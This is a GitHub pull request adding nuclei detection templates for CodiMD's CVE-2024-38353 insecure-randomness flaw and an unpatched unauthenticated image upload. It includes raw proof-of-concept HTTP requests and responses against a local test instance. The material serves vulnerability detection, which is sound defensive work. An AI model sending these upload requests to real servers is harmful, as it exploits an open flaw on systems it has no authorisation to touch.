Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add CodiMD CVE and unauth file upload checks #11300

Merged
merged 9 commits into from
Jan 8, 2025
Merged

Add CodiMD CVE and unauth file upload checks #11300

merged 9 commits into from
Jan 8, 2025

Conversation

denandz
Copy link
Contributor

@denandz denandz commented Dec 5, 2024

Template / PR Information

Template Validation

I've validated this template locally?

  • YES
  • NO

Additional Details (leave it blank if not applicable)

Vulnerable to insecure randomness (fixed by CodiMD in 2.5.4 under CVE-2024-38353):

POST /uploadimage HTTP/1.1
Host: 127.0.0.1:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.7 Safari/537.36
Content-Length: 284
Accept-Encoding: gzip
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------92633278134516118923780781161

-----------------------------92633278134516118923780781161
Content-Disposition: form-data; name="image"; filename="2pmdy4CdZw1P7Ij743Zzw0wJp35.gif"
Content-Type: image/gif

GIF89a...yoink...

HTTP/1.1 200 OK^M
Connection: close^M
Content-Length: 49^M
Codimd-Version: 2.5.3^M
Content-Security-Policy: default-src 'self'; script-src 'self' vimeo.com https://gist.github.com www.slideshare.net https://query.yahooapis.com 'unsafe-eval' https://cdnjs.cloudflare.com https://cdn.jsdelivr.net https://cdn.mathjax.org https://disqus.com https://*.disqus.com https://*.disquscdn.com https://www.google-analytics.com 'nonce-b7da5189-ed5d-4bd6-9e24-7ea66c7aa655' 'sha256-81acLZNZISnyGYZrSuoYhpzwDTTxi7vC1YM4uNxqWaM='; img-src * data:; style-src 'self' 'unsafe-inline' https://github.githubassets.com https://cdnjs.cloudflare.com https://cdn.jsdelivr.net https://fonts.googleapis.com https://*.disquscdn.com; font-src 'self' data: https://public.slidesharecdn.com https://cdnjs.cloudflare.com https://fonts.gstatic.com https://*.disquscdn.com; object-src *; media-src *; child-src *; connect-src *^M
Content-Type: application/json; charset=utf-8^M
Date: Thu, 05 Dec 2024 05:10:36 GMT^M
Etag: W/"31-gm8YloZEu0CYnCLfa37DBbEDZqM"^M
Referrer-Policy: same-origin^M
Set-Cookie: connect.sid=s%3AGfPQaUcUBqIDdFRnxJJpLYQoc2wHZ-WE.fStSBu83X3GLKA3H0QKoViDtNO0%2BZrJIC%2FTCj8JKzm4; Path=/; Expires=Thu, 19 Dec 2024 05:10:36 GMT; HttpOnly^M
X-Powered-By: Express^M
^M
{"link":"/uploads/c0d90fa3da7e1dbcd223d9800.gif"}

Not vulnerable to insecure randomisation, still vulnerable to unauth file upload (hasn't been fixed by CodiMD):

POST /uploadimage HTTP/1.1^M
Host: 127.0.0.1:3000^M
User-Agent: Mozilla/5.0 (Fedora; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0^M
Content-Length: 284^M
Accept-Encoding: gzip^M
Connection: close^M
Content-Type: multipart/form-data; boundary=---------------------------92633278134516118923780781161^M
^M
-----------------------------92633278134516118923780781161^M
Content-Disposition: form-data; name="image"; filename="2pmf7tlK93pfNFb51phi1SyhN6R.gif"^M
Content-Type: image/gif^M
^M
GIF89a...yoink...

HTTP/1.1 200 OK^M
Connection: close^M
Content-Length: 63^M
Codimd-Version: 2.5.4^M
Content-Security-Policy: default-src 'self'; script-src 'self' vimeo.com https://gist.github.com www.slideshare.net https://query.yahooapis.com 'unsafe-eval' https://cdnjs.cloudflare.com https://cdn.jsdelivr.net https://cdn.mathjax.org https://disqus.com https://*.disqus.com https://*.disquscdn.com https://www.google-analytics.com 'nonce-772cd18e-b401-4f75-966c-e163cd89520a' 'sha256-81acLZNZISnyGYZrSuoYhpzwDTTxi7vC1YM4uNxqWaM='; img-src * data:; style-src 'self' 'unsafe-inline' https://github.githubassets.com https://cdnjs.cloudflare.com https://cdn.jsdelivr.net https://fonts.googleapis.com https://*.disquscdn.com; font-src 'self' data: https://public.slidesharecdn.com https://cdnjs.cloudflare.com https://fonts.gstatic.com https://*.disquscdn.com; object-src *; media-src *; child-src *; connect-src *^M
Content-Type: application/json; charset=utf-8^M
Date: Thu, 05 Dec 2024 05:20:08 GMT^M
Etag: W/"3f-rUxaAl4+L8dKya0mzC/Hz8xJ5So"^M
Referrer-Policy: same-origin^M
Set-Cookie: connect.sid=s%3AWhh6OlYhqQMrx5DN2WYKzGJHqVrGEAaz.KrgosQng5%2BZYbA7KQ8hJJwyUQLl7BglxJyKvH9gsTak; Path=/; Expires=Thu, 19 Dec 2024 05:20:08 GMT; HttpOnly^M
X-Powered-By: Express^M
^M
{"link":"/uploads/upload_027ecc8dd217330ea74e5898a823b94d.gif"}

Additional References:

@DhiyaneshGeek DhiyaneshGeek added the Done Ready to merge label Dec 30, 2024
@denandz
Copy link
Contributor Author

denandz commented Dec 30, 2024
edited
Loading

@DhiyaneshGeek FYI the second file you deleted wasn't a duplicate. The unauthenticated file upload still exists in patched CodiMD installations, but the filename generation logic has changed to fix some of the issues highlighted in the CVE. It's why the matchers are different.

@DhiyaneshGeek
Copy link
Member

Hi @denandz

i have reverted the changes, thanks for letting me know

Thanks

@ritikchaddha ritikchaddha merged commit 78bf398 into projectdiscovery:main Jan 8, 2025
3 checks passed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@ritikchaddha ritikchaddha ritikchaddha approved these changes

Assignees

@DhiyaneshGeek DhiyaneshGeek

Labels
Done Ready to merge
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
3 participants
@denandz @DhiyaneshGeek @ritikchaddha